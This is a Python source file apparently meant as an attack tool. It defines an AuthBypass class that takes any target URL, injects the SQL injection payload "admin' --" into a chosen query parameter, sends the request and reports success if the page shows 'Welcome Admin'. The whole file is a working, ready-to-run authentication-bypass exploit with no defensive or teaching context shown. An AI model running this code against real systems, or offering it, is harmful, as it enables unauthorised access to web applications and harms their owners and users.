import http.client
import urllib.parse

class AuthBypass:
    """
    This class is responsible for performing authentication bypass attacks on a specified target URL.
    """

    def exploit(self, target_url: str, param_name='username') -> str:
        """
        Attempts to exploit authentication mechanisms to bypass security on the given target URL.

        Args:
        target_url (str): The URL of the target web application.
        param_name (str): The query parameter name that is vulnerable to injection.

        Returns:
        str: The result of the exploitation attempt.
        """
        # Default payload for authentication bypass
        payload = "admin' --"
        parsed_url = urllib.parse.urlparse(target_url)
        connection = http.client.HTTPConnection(parsed_url.netloc)

        # Prepare the malicious query with proper URL encoding
        if parsed_url.query:
            params = dict(urllib.parse.parse_qsl(parsed_url.query))
            params[param_name] = payload  # Dynamically use the parameter name
            malicious_query = urllib.parse.urlencode(params)
        else:
            malicious_query = urllib.parse.urlencode({param_name: payload})

        malicious_url = f"{parsed_url.path}?{malicious_query}"

        try:
            # Sending the request with the payload
            connection.request("GET", malicious_url)
            response = connection.getresponse()

            # Reading the response and checking for specific success indicators
            response_data = response.read().decode()
            if "Welcome Admin" in response_data:  # Assuming 'Welcome Admin' is a success indicator
                return f"Success: Bypassed authentication at {target_url}"
            else:
                return f"Failed: Target not vulnerable or protected at {target_url}"
        except Exception as e:
            return f"Error during exploitation: {str(e)}"
        finally:
            connection.close()
